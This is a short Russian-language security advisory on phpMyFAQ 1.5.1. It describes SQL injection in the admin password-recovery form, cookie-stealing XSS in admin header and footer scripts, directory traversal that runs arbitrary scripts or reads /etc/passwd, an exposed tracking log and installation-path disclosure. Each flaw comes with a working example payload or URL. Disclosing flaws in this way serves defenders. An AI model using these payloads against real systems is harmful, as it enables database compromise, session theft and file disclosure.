Программа: phpMyFAQ 1.5.1
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды и PHP сценарии на целевой системе.
1. SQL-инъекция обнаружена в сценарии '/admin/password.php' из-за недостаточной обработки входных данных. При выключенной опции PHP magic quotes удаленный пользователь может выполнить произвольные SQL команды на системе. Пример формы восстановления пароля:
user: ' or isnull(1/0) /*
mail: [your_email]
2. Удаленный пользователь может произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Пример:
http://[target]/[path]/phpmyfaq/admin/footer.php? PMF_CONF[version]=<script>alert(document.cookie)
</script>
http://[target]/[path]/phpmyfaq/admin/header.php? PMF_LANG[metaLanguage]="><script>alert(document.cookie)
</script>
3. Удаленный пользователь может выполнить произвольный PHP сценарий на системе с помощью символов обхода каталога.
Пример:
http://[target]/[path]/phpmyfaq/index.php? LANGCODE=/../../../../[scriptname]
http://[target]/[path]/phpmyfaq/index.php? LANGCODE=/../../ ../../../../etc/passwd%00
4. Удаленный пользователь может получить доступ к лог файлу. Пример:
http://[target]/[path]/phpmyfaq/data/tracking[date]
5. Удаленный пользователь может получить данные об установочной директории приложения на сервере. Пример:
http://[target]/[path]/phpmyfaq/index.php?LANGCODE=[a_non_existent_file]